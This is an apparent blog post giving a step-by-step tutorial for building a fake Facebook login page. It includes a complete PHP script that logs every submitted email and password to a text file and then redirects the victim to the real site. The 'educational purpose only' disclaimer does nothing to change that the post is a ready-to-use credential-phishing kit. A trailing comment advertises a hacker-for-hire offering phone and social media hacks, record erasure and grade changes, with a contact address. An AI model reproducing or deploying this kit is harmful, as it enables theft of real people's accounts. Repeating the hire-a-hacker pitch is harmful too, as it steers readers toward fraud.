How To hack Facebook(Phishing)






Hacking Facebook By Phishing/Fake Page



Note: This content is for educational purpose only. Any script or attribute used for any antisocial material will not be tolerated.

In this tutorial we will learn how to create a facebook fake page which will look same as https://www.facebook.com, except the link address.


Step 1



For making a facebook fake page we first need a free webhosting site for e.g.,http://www.000webhost.com. Create a free account here and we are done with the hosting thing. now comes the fake page. For this job we first need to copy the source code of the login page of facebook..Just go to https://www.facebook.com and right click on the screen and click on view page source and copy this and paste it to an simple text file and save the file as index.html. Now open the file on a text editor and search for [form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"] and replace "https://www.facebook.com/login.php?login_attempt=1" with login.php and save the file



Step 2





login.php


Copy the below code and paste it in a file and then save the file as login.php

<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

we are done with the php section now we need to create a blank text file and name it as log and save it ...




Now we have to upload these three files [index.html, login.php and log.txt] to the hosting account which we have created in the begining



we are all done now, just copy the link of the index.html and try to enter a email and password and then open log.txt if your input is present in that file then there's no mistake, if it doesnot work then please check for spelling mistakes, php codes and location of the files you uploaded. Note that the file should be in the same folder.

Thankyou and have a nice day

Don't forget to subscribe ;)

1 comments:

felisha green said...


This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change

Email: cybergoldenhacker at gmail dot com

Post a Comment